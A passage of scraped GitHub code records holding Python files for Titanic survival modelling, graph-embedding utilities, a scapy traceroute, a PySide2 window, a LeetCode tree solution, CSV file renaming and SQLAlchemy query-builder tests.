0)\r\nprint(pd3)\r\npd.crosstab(train_data.Sex,train_data.Survived).plot(kind='bar',ylabel='人数',width=0.4,color=['g','y'],alpha=0.6)\r\n\r\n#统计经济地位阶层生存情况\r\npd4=pd.DataFrame(train_data.groupby(['Pclass'])['Survived'].value_counts(normalize=True)*100)\r\nprint(pd4)\r\npd.crosstab(train_data.Pclass,train_data.Survived).plot(kind='bar',ylabel='人数',width=0.4,color=['g','y'],alpha=0.6)\r\n\r\n#统计经济地位阶层性别生存情况\r\npd5=pd.DataFrame(train_data.groupby(['Pclass'])['Sex'].value_counts())\r\nprint(pd5)\r\n\r\n#统计各登船港口的人数\r\ntrain_data.Embarked.value_counts().plot(kind='line',xlabel='Starting Point',ylabel='人数',color='b',alpha=0.6,linestyle='--')\r\n\r\n#统计各登船港口生存/死亡人数\r\npd.crosstab(train_data.Survived,train_data.Embarked).plot(kind='bar',xlabel='Survived',ylabel='人数',width=0.4,color=['g','y','c'],alpha=0.6)\r\n\r\n#统计各登船港口性别生存/死亡数量\r\npd6=pd.DataFrame(train_data.groupby(['Embarked','Sex'])['Survived'].value_counts())\r\nprint(pd6)\r\n\r\n#统计各列数据为空的总数\r\nprint(train_data.isna().sum())\r\nprint(test_data.isna().sum())\r\n\r\n#填充缺失值\r\ntrain_data.Embarked.fillna('S',inplace=True)\r\nprint(train_data.isna().sum())\r\n\r\n#填充Fare的缺失值\r\nprint(test_data.groupby(['Embarked','Pclass'])['Fare'].describe())\r\n\r\nprint(test_data[test_data['Fare'].isna()])\r\n\r\ntest_data.Fare.fillna(test_data[(test_data['Pclass']==3)&(test_data['Embarked']=='S')].Fare.median(),inplace=True)\r\nprint(test_data.isna().sum())\r\n\r\n#填充Cabin的缺失值\r\ntrain_Fare_Grp=pd.qcut(train_data.Fare,q=4,labels=['Economy','Economy Plus','Business','First'])\r\ntrain_data['Fare_Gp']=train_Fare_Grp\r\nprint(train_data.head())\r\n\r\ntest_Fare_Grp=pd.qcut(test_data.Fare,q=4,labels=['Economy','Economy Plus','Business','First'])\r\ntest_data['Fare_Gp']=test_Fare_Grp\r\nprint(test_data.head())\r\n\r\ndef cabin_fill(df):\r\n for i in range(len(df)):\r\n if(df['Cabin'].isna()[i]):\r\n fgp=df.iloc[i,:]['Fare_Gp']\r\n pcl=df.iloc[i,:]['Pclass']\r\n val=df[(df['Fare_Gp']==fgp)|(df['Pclass']==pcl)].Cabin.mode().values[0]\r\n df['Cabin'].iloc[i]=val\r\n return (df)\r\n\r\ncabin_fill(train_data)\r\nprint(train_data.isna().sum())\r\n\r\ncabin_fill(test_data)\r\nprint(test_data.isna().sum())\r\n\r\n\r\ndef title(df):\r\n title=[]\r\n for i in range(len(df)):\r\n tokens=df.iloc[i,:]['Name'].split(',')\r\n title.append(tokens[1].split(' ')[1])\r\n df['Title']=title\r\n return (df)\r\n\r\ntitle(train_data)\r\nprint(train_data.head())\r\n\r\ntitle(test_data)\r\nprint(test_data.head())\r\n\r\ntdg=train_data.groupby(['Title','Sex'])['Age'].describe()\r\nprint(tdg)\r\n\r\ntdg2=test_data.groupby(['Title','Sex'])['Age'].describe()\r\nprint(tdg2)\r\n\r\nprint(train_data.Title.value_counts())\r\n\r\ntrain_data.Title.replace(['Mlle.','Mme.','Ms.','Major.','Lady.','Jonkheer.',\r\n 'Col.','Rev.','Capt.','Sir.','Don.','the','Dr.'],\r\n ['Miss.','Miss.','Mrs.','Other','Mrs.','Mr.','Other',\r\n 'Other','Other','Other','Mr.','Mrs.','Other'],inplace=True)\r\nprint(train_data.Title.value_counts())\r\nprint(test_data.Title.value_counts())\r\n\r\ntest_data.Title.replace(['Col.','Rev.','Ms.','Dona.','Dr.'],\r\n ['Other','Other','Miss.','Mrs.','Other'],inplace=True)\r\nprint(test_data.Title.value_counts())\r\n\r\ndef age_fill(df):\r\n for i in range(len(df)):\r\n if(np.isnan(df.iloc[i,:]['Age'])==True):\r\n ttl=df.iloc[i,:]['Title']\r\n val=df[(df['Title']==ttl)].Age.median()\r\n df['Age'].iloc[i]=val\r\n return (df)\r\n\r\nage_fill(train_data)\r\nprint(train_data.isna().sum())\r\nage_fill(test_data)\r\nprint(test_data.isna().sum())\r\n\r\nprint(train_data.head())\r\n\r\ntrain_data.drop(['Name','Fare_Gp','Title'],axis=1,inplace=True)\r\nprint(train_data.head())\r\ntest_data.drop(['Name','Fare_Gp','Title'],axis=1,inplace=True)\r\nprint(test_data.head())\r\n\r\ny=train_data.Survived\r\ntrain_data.drop(['Survived'],axis=1,inplace=True)\r\nprint(train_data.head())\r\n\r\ndata=pd.concat([train_data,test_data],axis=0)\r\nprint(data.shape)\r\n\r\ndata=pd.get_dummies(data,drop_first=True)\r\nprint(data.head())\r\n\r\ntrain_data=data[data['PassengerId']<892]\r\nprint(train_data.head())\r\ntest_data=data[data['PassengerId']>892]\r\nprint(test_data.head())\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nscaler=StandardScaler()\r\ntrain_scaled=scaler.fit_transform(train_data)\r\ntest_scaled=scaler.fit_transform(test_data)\r\n\r\nprint(train_scaled.shape,test_scaled.shape)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nx_train,x_test,y_train,y_test=train_test_split(train_scaled,y,test_size=0.2)\r\nprint(x_train.shape,x_test.shape)\r\n\r\nprint(y_train)\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.naive_bayes import BernoulliNB\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.model_selection import StratifiedKFold\r\n\r\n#逻辑回归\r\nskf=StratifiedKFold(n_splits=5,shuffle=True)\r\nlogmod_scores=cross_val_score(LogisticRegression(solver='liblinear'),train_scaled,y,cv=skf)\r\nprint(logmod_scores.mean())\r\n\r\nlogmod=LogisticRegression(solver='liblinear')\r\nlogmod.fit(x_train,y_train)\r\nypred_logmod=logmod.predict(x_test)\r\ncm_log=confusion_matrix(y_test,ypred_logmod)\r\nsns.heatmap(cm_log,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_logmod))\r\n\r\n#SVM\r\nsvm_scores=cross_val_score(SVC(C=150,kernel='linear'),train_data,y,cv=3)\r\nprint(svm_scores.mean())\r\n\r\nsvmod=SVC(C=150,kernel='linear')\r\nsvmod.fit(x_train,y_train)\r\nypred_svmod=svmod.predict(x_test)\r\ncm_svm=confusion_matrix(y_test,ypred_svmod)\r\nsns.heatmap(cm_svm,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_svmod))\r\n\r\n#Decision Tree\r\ndectre_score=cross_val_score(DecisionTreeClassifier(),train_scaled,y,cv=skf)\r\nprint(dectre_score.mean())\r\n\r\ndectre_mod=DecisionTreeClassifier()\r\ndectre_mod.fit(x_train,y_train)\r\nypred_dectre=dectre_mod.predict(x_test)\r\ncm_dectre=confusion_matrix(y_test,ypred_dectre)\r\nsns.heatmap(cm_dectre,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_dectre))\r\n\r\n#Random Forest\r\nrf_scores=cross_val_score(RandomForestClassifier(criterion='gini'),train_scaled,y,cv=skf)\r\nprint(rf_scores.mean())\r\n\r\nrfmod=RandomForestClassifier()\r\nrfmod.fit(x_train,y_train)\r\nypred_rfmod=rfmod.predict(x_test)\r\ncm_rf=confusion_matrix(y_test,ypred_rfmod)\r\nsns.heatmap(cm_rf,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_rfmod))\r\n\r\n#Bernoulli NB\r\nnbmod_scores=cross_val_score(BernoulliNB(),train_scaled,y,cv=skf)\r\nprint(nbmod_scores.mean())\r\n\r\nnbmod=BernoulliNB()\r\nnbmod.fit(x_train,y_train)\r\nypred_nb=nbmod.predict(x_test)\r\ncm_nb=confusion_matrix(y_test,ypred_nb)\r\nsns.heatmap(cm_nb,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_nb))\r\n\r\n#Submission\r\nmodel=RandomForestClassifier(criterion='gini')\r\nmodel.fit(train_scaled,y)\r\nypred_rf=model.predict(test_scaled)\r\npath=pd.DataFrame({'PassengerId':data.PassengerId[891:],'Survived':ypred_rf})\r\nprint(path.to_csv(r'E:\\titanic\\Submission.csv',index=False))\r\n","repo_name":"rgyfmm/machinelearning","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":8850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22607355472","text":"from pathlib import Path\nimport scipy.sparse as sp\nimport numpy as np\nimport torch\nfrom typing import *\n\n\ndef normalize(mx):\n \"\"\"Row-normalize sparse matrix\"\"\"\n rowsum = np.array(mx.sum(1)) # 对每一行求和\n r_inv = np.power(rowsum, -1).flatten() # 求倒数\n r_inv[np.isinf(r_inv)] = 0. # 如果某一行全为0,则r_inv算出来会等于无穷大,将这些行的r_inv置为0\n r_mat_inv = sp.diags(r_inv) # 构建对角元素为r_inv的对角矩阵\n mx = r_mat_inv.dot(mx)\n # 用对角矩阵与原始矩阵的点积起到标准化的作用,原始矩阵中每一行元素都会与对应的r_inv相乘,最终相当于除以了sum\n return mx\n\n\ndef normalize_np(mx: np.ndarray) -> np.ndarray:\n # 对每一行进行归一化\n rows_sum = np.array(mx.sum(1)).astype('float') # 对每一行求和\n rows_inv = np.power(rows_sum, -1).flatten() # 求倒数\n rows_inv[np.isinf(rows_inv)] = 0 # 如果某一行全为0,则r_inv算出来会等于无穷大,将这些行的r_inv置为0\n # rows_inv = np.sqrt(rows_inv)\n rows_mat_inv = np.diag(rows_inv) # 构建对角元素为r_inv的对角矩阵\n mx = rows_mat_inv.dot(mx) # .dot(cols_mat_inv)\n return mx\n\n\ndef load_prepared_data(dataset='cora'):\n # sp.save_npz('{}_adj.npz'.format(dataset), adj)\n # sp.save_npz('{}_features.npz'.format(dataset), features)\n # # sp.save_npz('{}_labels.npz'.format(dataset),save_labels)\n # np.save('{}_labels.npy'.format(dataset), save_labels)\n print('Loading {} dataset'.format(dataset))\n path = Path(__file__).parent / 'data'\n labels = np.load(path / '{}_labels.npy'.format(dataset))\n adj = sp.load_npz(path / '{}_adj.npz'.format(dataset))\n adj = normalize(adj + sp.eye(adj.shape[0])) # eye创建单位矩阵,第一个参数为行数,第二个为列数\n # adj = normalize(adj)\n labels = torch.LongTensor(labels)\n adj = torch.FloatTensor(adj.todense())\n print('finish loading')\n if dataset in {'BlogCatalog', 'citeseer', 'cora', 'Flickr', 'pubmed'}:\n features = sp.load_npz(path / '{}_features.npz'.format(dataset))\n features = normalize(features)\n features = torch.FloatTensor(np.array(features.todense()))\n else:\n features = torch.FloatTensor(np.diag(np.ones(labels.shape[0])))\n return adj, features, labels\n\n\ndef load_ripple_data(dataset='cora'):\n print('Loading {} dataset'.format(dataset))\n path = Path(__file__).parent / 'data'\n labels = np.load(path / '{}_labels.npy'.format(dataset))\n ripple = sp.load_npz(path / '{}_ripple.npz'.format(dataset))\n ripple = normalize(ripple + sp.eye(ripple.shape[0])) # eye创建单位矩阵,第一个参数为行数,第二个为列数\n # adj = normalize(adj)\n labels = torch.LongTensor(labels)\n ripple = torch.FloatTensor(ripple.todense())\n print('finish loading')\n if dataset in {'BlogCatalog', 'citeseer', 'cora', 'Flickr', 'pubmed'}:\n features = sp.load_npz(path / '{}_features.npz'.format(dataset))\n features = normalize(features)\n features = torch.FloatTensor(np.array(features.todense()))\n else:\n features = torch.FloatTensor(np.diag(np.ones(labels.shape[0])))\n return ripple, features, labels\n\n\ndef accuracy(output, labels):\n preds = output.max(1)[1].type_as(labels) # 使用type_as(tesnor)将张量转换为给定类型的张量。\n correct = preds.eq(labels).double() # 记录等于preds的label eq:equal\n correct = correct.sum()\n return correct / len(labels)\n\n\ndef sampling(src_nodes: torch.TensorType, sample_num, neighbor_table):\n \"\"\"根据源节点采样指定数量的邻居节点,注意使用的是有放回的采样;\n 某个节点的邻居节点数量少于采样数量时,采样结果出现重复的节点\n 在src_nodes中每个节点都采样,采样sample_num个\n Arguments:\n src_nodes {Tensor} -- 源节点列表\n sample_num {int} -- 需要采样的节点数\n neighbor_table {dict} -- 节点到其邻居节点的映射表\n Returns:\n np.ndarray -- 采样结果构成的列表\n \"\"\"\n results = []\n for i in range(src_nodes.shape[0]):\n sid = src_nodes[i].item()\n # 从节点的邻居中进行有放回地进行采样\n # print(sid)\n # print(len(neighbor_table[500]))\n # if len(neighbor_table[sid])==0:\n # print('sid:{}'.format(sid))\n # print('neighbor:{}'.format(neighbor_table[sid]))\n res = np.random.choice(neighbor_table[sid], size=(sample_num,))\n results.append(res)\n return torch.from_numpy(np.asarray(results).flatten())\n\n\ndef multihop_sampling(src_nodes: torch.TensorType, sample_nums, neighbor_table) -> List[torch.TensorType]:\n \"\"\"根据源节点进行多阶采样\n Arguments:\n src_nodes {list, np.ndarray} -- 源节点id\n sample_nums {list of int} -- 每一阶需要采样的个数\n neighbor_table {dict} -- 节点到其邻居节点的映射\n\n Returns:\n [list of ndarray] -- 每一阶采样的结果\n \"\"\"\n sampling_result = [src_nodes]\n for k, hopk_num in enumerate(sample_nums):\n hopk_result = sampling(sampling_result[k], hopk_num, neighbor_table)\n sampling_result.append(hopk_result)\n return sampling_result\n","repo_name":"Xiaoctw/GraphEmbedding","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6286361508","text":"from scapy.all import *\nfrom scapy.layers.inet import IP, ICMP\nfrom ipwhois.ipwhois import IPWhois\nimport multiprocessing\n\n\ndef whois(ip):\n try:\n whois_obj = IPWhois(ip)\n results = whois_obj.lookup_rdap(depth=1)\n return results[\"asn_description\"] + \" - \" + \\\n results[\"network\"][\"remarks\"][0][\"description\"]\n except Exception:\n return \"\"\n\n\ndef send_packet_and_get_reply(pck, ttl, is_end):\n reply = sr1(pck, verbose=0) # ip <- ICMP - reply.payload\n if reply is None:\n is_end.value = 1\n ip = reply.src\n print(f\"{ttl}: {ip}: {whois(ip)}\")\n if reply.payload.type == 0:\n is_end.value = 1\n else:\n is_end.value = 0\n\n\ndef trace_route(hostname):\n for i in range(1, 31):\n pck = IP(dst=hostname, ttl=i) / ICMP()\n ret_value = multiprocessing.Value(\"i\", 0, lock=False)\n process = multiprocessing.Process(\n target=send_packet_and_get_reply, args=(pck, i, ret_value))\n process.start()\n process.join(60)\n if process.is_alive():\n print(\"* * *\")\n process.terminate()\n break\n else:\n if ret_value.value == 1:\n break\n\n\nif __name__ == \"__main__\":\n try:\n trace_route(input())\n except OSError as error:\n print(\"Please, check your internet connection \"\n \"or try use script as administrator\")\n","repo_name":"bkmz1840/Protocols","sub_path":"First theme/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71559909229","text":"import sys\nimport logging\n\nfrom PySide2.QtWidgets import (\n QMainWindow,\n QDockWidget,\n QMdiArea,\n QMdiSubWindow,\n )\n\nfrom PySide2.QtCore import Qt\n\nfrom components import ComponentGuiConstructor\n\n\nclass GeoMainWindow(QMainWindow):\n\n _initialized = False\n _instance = None\n\n def __init__(self):\n if not GeoMainWindow._initialized:\n super().__init__()\n GeoMainWindow._initialized = True\n\n self.mdi_area = QMdiArea()\n self.setCentralWidget(self.mdi_area)\n\n def __new__(cls):\n \"\"\" Singleton \"\"\"\n if GeoMainWindow._instance is None:\n GeoMainWindow._instance = super().__new__(cls)\n return GeoMainWindow._instance\n\n\n\n def addToCentral(self, widget, title = \"\"):\n gamma_logger = logging.getLogger(\"gamma_logger\")\n\n gamma_logger.debug(\"Adding to central : {}\".format(widget))\n if widget:\n sub_window = self.mdi_area.addSubWindow(widget)\n sub_window.setAttribute(Qt.WidgetAttribute.WA_DeleteOnClose);\n sub_window.setWindowTitle(title)\n sub_window.showMaximized()\n\n def addMenu(self, menu):\n if menu:\n self.menuBar().addMenu(menu)\n\n\n def addDockindWidget(self, widget, widget_area):\n if widget:\n dock_widget = QDockWidget()\n dock_widget.setWindowTitle(widget.windowTitle())\n dock_widget.setWidget(widget)\n self.addDockWidget(widget_area, dock_widget)\n\n\n\n\ndef initialize_component():\n GeoMainWindow().setWindowTitle(\"Petrophysics\")\n GeoMainWindow().show()\n # GeoMainWindow().showMaximized()\n\nif not 'unittest' in sys.modules.keys():\n initialize_component()\n","repo_name":"iGeophysix/gamma","sub_path":"components/mainwindow/gui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24547012150","text":"contatos = {\n \"henrique@gmail.com\": {\"nome\": \"Henrique\", \"telefone\": \"3333-2221\"},\n \"giovanna@gmail.com\": {\"nome\": \"Giovanna\", \"telefone\": \"3443-2121\"},\n \"chappie@gmail.com\": {\"nome\": \"Chappie\", \"telefone\": \"3344-9871\"},\n \"melaine@gmail.com\": {\"nome\": \"Melaine\", \"telefone\": \"3333-7766\"},\n}\n\nteste = \"henrique@gmail.com\" in contatos # True\nprint(teste)\n\nteste = \"megui@gmail.com\" in contatos # False\nprint(teste)\n\nteste = \"idade\" in contatos[\"henrique@gmail.com\"] # False\nprint(teste)\n\nteste = \"telefone\" in contatos[\"giovanna@gmail.com\"] # True\nprint(teste)","repo_name":"henrique-sk/Ciencia_de_Dados-DIO-Geracao_Tech_Unimed_BH","sub_path":"02 - Python para Cientistas de Dados/07 - Estrutura de dados/04-Dicionarios/15_in.py","file_name":"15_in.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24107786195","text":"from binary_tree import create_btree_with_list\nfrom collections import deque\n\n\nclass Solution:\n def flatten(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n \n \"\"\"\n 2 Steps:\n 1. Since the problem want a DFS way to print the tree\n we shall first use a recursive function to save each \n nodes into a stack(a first come last out array)\n 2. Next,use a BFS way to write each level of the tree, \n each time, pop out the 1st element as the right node's value\n and come to the next level calling the writing function itself.\n \"\"\"\n if root:\n result_stack = deque()\n self.dfs_tree_to_stack(root, result_stack)\n #return(result_stack)\n result_stack.popleft()\n self.stack_2_tree(root, result_stack)\n #return(root)\n \n\n\n \n \"\"\"\n dfs_tree_to_array function takes a tree's root,\n and export an array recording the node's value \n from top to leaf, left to right\n \"\"\"\n def dfs_tree_to_array(self, root, result):\n # result as global variable\n if not root:\n return(result)\n result.append(root.value)\n if root.left:\n result = self.dfs_tree_to_array(root.left, result) \n if root.right:\n result = self.dfs_tree_to_array(root.right, result) \n return(result)\n \"\"\"\n The biggest problem of this solution is that, it skip\n the empty nodes in the tree, meaning that with the output \n list, cannot re-create the tree.\n \"\"\"\n\n def dfs_tree_to_array_II(self, root, result):\n # How to not skip a empty child node but does not\n # influence when both child nodes are empty(leaf)\n if not root:\n return(result.append(None))\n\n result.append(root.value)\n\n if not root.left and not root.right:\n return(result)\n \n self.dfs_tree_to_array_II(root.left, result)\n self.dfs_tree_to_array_II(root.right,result)\n\n \n \"\"\"\n do not use :\n\n ```\n try:\n result = self.dfs_tree_to_array_II(root.left, result)\n result = self.dfs_tree_to_array_II(root.right,result)\n except:\n print(root) # 5 -> 6\n print(result) # None\n ```\n\n it will stuck at [1,2,3,4,5,None]\n because after running\n result = self.dfs_tree_to_array_II(root.left, result)\n result will be None rather than [1,2,3,4,5],\n and by running the next statement:\n result = self.dfs_tree_to_array_II(root.right, result)\n It will not allow you to append root.right to result which is None\n \"\"\"\n return(result)\n\n \"\"\"\n Inplace Operation:\n hat is an operation that modifies the object and returns nothing\n \"\"\"\n # Skip Empty Child Nodes\n def dfs_tree_to_stack(self, root, result_stack):\n\n if not root:\n return(result_stack)\n #pass\n result_stack.append(root)\n if root.left:\n self.dfs_tree_to_stack(root.left, result_stack) \n if root.right:\n self.dfs_tree_to_stack(root.right, result_stack)\n return(result_stack)\n\n # Keep record of Empty Child Nodes\n def dfs_tree_to_stack_II(self, root, result_stack):\n if not root:\n return(result_stack.append(None))\n\n result_stack.append(root)\n\n if not root.left and not root.right:\n return(result_stack)\n\n self.dfs_tree_to_stack_II(root.left, result_stack)\n self.dfs_tree_to_stack_II(root.right, result_stack)\n return(result_stack)\n\n def stack_2_tree(self, root, result_stack):\n if result_stack:\n root.left = None\n root.right = result_stack.popleft()\n self.stack_2_tree(root.right, result_stack)\n else:\n return(root)\n\n\n \n\n\ndata = [1,2,5,3,4,None,6]\ntree = create_btree_with_list(data)\nprint(tree)\ns = Solution()\ns.flatten(tree)\nprint(tree)\n\n ","repo_name":"ChenjiahuiLi/Python-for-Everybody","sub_path":"Leetcode/leetcode_114_flatten_binary_tree_to_linked_list.py","file_name":"leetcode_114_flatten_binary_tree_to_linked_list.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33757722886","text":"#must run using python3 command eg. \"python3 pandasAttempt.py\"\n\nimport os, csv, pandas, sys\n\npath=os.getcwd()\n# make list of all files in directory\nallFiles = os.listdir(path)\n\nfor dataFile in allFiles:\n # rename xls extension to csv\n base_file, ext = os.path.splitext(dataFile)\n if ext == \".xls\":\n os.rename(dataFile, base_file + \".csv\")\n print(dataFile)\n\n# declare empty list for csv files\ncsvFiles = []\n# redefine allFiles variable to include newly renamed files\nallFiles = os.listdir(path)\n# add file to csvFiles list\nfor csvFile in allFiles:\n base_file, ext = os.path.splitext(csvFile)\n if ext == \".csv\":\n csvFiles.append(csvFile)\n # print(csvFile)\n\n\n# print number of csv files in directory\nprint(str(len(csvFiles)) + \" csv files\")\n\nfor csvFile in csvFiles:\n standings = pandas.read_csv(csvFile, sep='/t', header=None, engine='python')\n# modStandings = standings.replace(\"⋯\", \"-\", regex=True)\n# modStandings.to_csv('new/'+csvFile, index=False)\n\n # for row in standings.itertuples(index=True, name='Pandas'):\n # if standings[row][0].startswith(\"Standings\"):\n # print(\"booya\")\n\n for row in standings:\n if standings[row][0].startswith(\"Standings\"):\n print(\"Found it\")\n\n # select first two rows\n # test = standings.head(n=2)\n # # test2 = test.iloc[0]\n # print(\"*****************************\")\n # # if test.iloc[0].str.startswith('Standings'):\n # # print(\"found it\")\n # # print(test2)\n # print(standings.columns)\n # print(\"*****************************\")\n # if standings.index[0].str.startswith(\"Standings\"):\n # print(\"Booya\")\n\n# using python csv module\n# might have to use this to drop rows because pandas only allows referring to rows by index for rows after what it interprets as header\n# for csvFile in csvFiles:\n# with open(csvFile, newline='') as f:\n# for line in f:\n# if line.startswith(\"Standings\"):\n# print(\"Found it\")\n\n","repo_name":"tpups/wfbc_utils","sub_path":"old/pandasAttempt.py","file_name":"pandasAttempt.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41167510648","text":"from __future__ import annotations\nfrom db_chat.sql_builder.Filter import Filter\nfrom db_chat.sql_builder.FilterOperator import FilterOperator\nfrom db_chat.sql_builder.Query import Query, Expression\n\nfrom db_chat.sql_builder.sqlalchemy_query_builder import Column, SQLAlchemyQueryBuilder, Schema, Table\nfrom db_chat.sql_builder.mappings import Relationship\n\n\nschema: Schema = Schema(\n tables={\n \"users\": Table(\n name=\"users\",\n friendly_name=\"users\",\n columns=[\n Column(name=\"name\", friendly_name=\"name\"),\n Column(name=\"id\", friendly_name=\"id\"),\n Column(name=\"email\", friendly_name=\"email\"),\n Column(name=\"posts\", friendly_name=\"posts\", relationships=[\"post_user\"]),\n ],\n ),\n \"posts\": Table(\n name=\"posts\",\n friendly_name=\"posts\",\n columns=[\n Column(name=\"id\", friendly_name=\"id\"),\n Column(name=\"user_id\", friendly_name=\"user_id\"),\n Column(name=\"title\", friendly_name=\"title\"),\n Column(name=\"body\", friendly_name=\"body\"),\n Column(name=\"likes\", friendly_name=\"likes\"),\n Column(name=\"user_name\", friendly_name=\"user name\", relationships=[\"post_user\"], related_field=\"name\"),\n Column(\n name=\"user_email\", friendly_name=\"user email\", relationships=[\"post_user\"], related_field=\"email\"\n ),\n ],\n ),\n \"comments\": Table(\n name=\"comments\",\n friendly_name=\"comments\",\n columns=[\n Column(name=\"id\", friendly_name=\"id\"),\n Column(name=\"post_id\", friendly_name=\"post_id\"),\n Column(name=\"body\", friendly_name=\"body\"),\n Column(\n name=\"comment_user_name\",\n friendly_name=\"user name\",\n relationships=[\"post_comments\", \"post_user\"],\n related_field=\"name\",\n ),\n ],\n ),\n },\n relationships=[\n Relationship(name=\"post_user\", table1=\"posts\", field1=\"user_id\", table2=\"users\", field2=\"id\"),\n Relationship(name=\"post_comments\", table1=\"posts\", field1=\"id\", table2=\"comments\", field2=\"post_id\"),\n ],\n)\n\nbuilder = SQLAlchemyQueryBuilder(schema)\n\n\ndef test_simple():\n \"\"\"\n Simple query\n \"\"\"\n\n query = Query(\n table=\"users\",\n fields=[\"name\", \"email\"],\n filters=[],\n sort=[\"name\"],\n limit=10,\n offset=10,\n )\n\n Sql = builder.build_query(query=query)\n assert Sql == \"SELECT users.name, users.email \\nFROM users\"\n\n\ndef test_simple_join():\n \"\"\"\n Simple join\n \"\"\"\n\n query = Query(\n table=\"posts\",\n fields=[\"title\", \"body\", \"user_name\"],\n )\n\n Sql = builder.build_query(query=query)\n assert (\n Sql\n == \"SELECT posts.title, posts.body, posts_post_user.name AS user_name \\nFROM posts JOIN users AS posts_post_user ON posts.user_id = posts_post_user.id\"\n )\n\n\ndef test_join_with_multiple_fields():\n \"\"\"\n simple join with multiple fields\n \"\"\"\n\n query = Query(\n table=\"posts\",\n fields=[\"title\", \"body\", \"user_name\", \"user_email\"],\n )\n S = builder.build_query(query=query)\n assert (\n S\n == \"SELECT posts.title, posts.body, posts_post_user.name AS user_name, posts_post_user.email AS user_email \\nFROM posts JOIN users AS posts_post_user ON posts.user_id = posts_post_user.id\"\n )\n\n\ndef test_two_level_join():\n \"\"\"\n Two level join\n \"\"\"\n\n query = Query(\n table=\"comments\",\n fields=[\"body\", \"comment_user_name\"],\n filters=[],\n sort=[\"title\"],\n limit=10,\n offset=10,\n )\n\n Sql = builder.build_query(query=query)\n assert (\n Sql\n == \"SELECT comments.body, comments_post_comments_post_user.name AS comment_user_name \\nFROM comments JOIN posts AS comments_post_comments ON comments.post_id = comments_post_comments.id JOIN users AS comments_post_comments_post_user ON comments_post_comments.user_id = comments_post_comments_post_user.id\"\n )\n\n\ndef test_simple_filter():\n \"\"\"\n Simple filter\n \"\"\"\n query = Query(\n table=\"users\",\n fields=[\"name\", \"email\"],\n filters=[Filter(field=\"name\", operator=FilterOperator.eq, value=\"John\")],\n sort=[\"name\"],\n limit=10,\n offset=10,\n )\n sql = builder.build_query(query=query)\n assert sql == \"SELECT users.name, users.email \\nFROM users \\nWHERE users.name = :name_1\"\n\n\n# filters with joins\ndef test_filter_with_join():\n \"\"\"\n Filter with join\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[\"title\", \"body\", \"user_name\"],\n filters=[Filter(field=\"user_name\", operator=FilterOperator.eq, value=\"John\")],\n )\n sql = builder.build_query(query=query)\n assert (\n sql\n == \"SELECT posts.title, posts.body, posts_post_user.name AS user_name \\nFROM posts JOIN users AS posts_post_user ON posts.user_id = posts_post_user.id \\nWHERE posts_post_user.name = :name_1\"\n )\n\n\n# aggregates and functions\ndef test_simple_aggregate():\n \"\"\"\n Simple aggregate\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[Expression(func=\"SUM\", params=[\"likes\"], label=\"total_likes\")],\n filters=[],\n sort=[\"title\"],\n limit=10,\n offset=10,\n )\n sql = builder.build_query(query=query)\n assert sql == \"SELECT sum(posts.likes) AS total_likes \\nFROM posts\"\n\n\ndef test_aggregate_with_columns():\n \"\"\"\n Aggregate with columns\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[Expression(func=\"SUM\", params=[\"likes\"], label=\"total_likes\"), \"title\"],\n filters=[],\n sort=[\"title\"],\n limit=10,\n offset=10,\n )\n sql = builder.build_query(query=query)\n assert sql == \"SELECT sum(posts.likes) AS total_likes, posts.title \\nFROM posts GROUP BY posts.title\"\n\n\n# filters with aggregates and functions\n# Having clause\ndef test_filters_with_aggregates():\n \"\"\"\n Filters with aggregates\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[\"title\"],\n filters=[Filter(Expression(func=\"SUM\", params=[\"likes\"]), operator=FilterOperator.eq, value=10)],\n sort=[\"title\"],\n limit=10,\n offset=10,\n )\n sql = builder.build_query(query=query)\n assert sql == \"SELECT posts.title \\nFROM posts GROUP BY posts.title \\nHAVING sum(posts.likes) = :sum_1\"\n\n\n# filters with constants and functions\n\n\n# group by\ndef test_group_by():\n \"\"\"\n Group by\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[\"title\", \"body\", \"user_name\"],\n group_by=[\"title\", \"body\", \"user_name\"],\n )\n sql = builder.build_query(query=query)\n assert (\n sql\n == 